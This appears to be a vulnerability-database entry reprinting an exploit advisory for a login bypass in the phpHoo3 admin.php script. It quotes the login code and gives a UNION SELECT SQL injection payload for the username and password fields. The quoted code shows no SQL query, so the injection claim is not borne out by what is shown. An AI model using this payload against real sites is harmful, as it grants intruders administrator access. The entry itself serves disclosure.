logo
DATABASE RESOURCES PRICING ABOUT US

phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability

Description

# phpHoo3 Login SQL injection // AYYILDIZ.ORG Gururla Sunar... # download:http://cable-modems.org/phpHoo/files/phphoo3.zip # author : iLker Kandemir < ilkerkandemir <at> mynet.com > # Risk : High # Class : Remote # Vuln. Script : phpHoo3 # tnx : h0tturk,ekin0x,Gencnesil,Gencturk,koray,Ajann .. Vulnerable; ///admin.php code ; if($HooPass == $ADMIN_COOKIE) { //If the cookie exists // should we delete the cookie and start? if (isset($exit_admin)) { setcookie("HooPass", ""); header ("Location: $SITE_URL$SITE_DIR"); exit; } } // Check to see if we are being posted a set of USER/PASS if (isset($LOGIN) && !empty($HTTP_POST_VARS)) { $vars = $HTTP_POST_VARS; if (($vars["USER"] == $ADMIN_USER) && ($vars["PASS"] == $ADMIN_PASS)) { setcookie("HooPass", $ADMIN_COOKIE); header ("Location: $SITE_URL$SITE_DIR"); exit; } //The cookie exists ... ADMIN_USER : 1/**/union/**/select/**/0,1,2,3,4/* ADMIN_PASS : 1/**/union/**/select/**/0,1,2,3,4/* ///admin.php logged...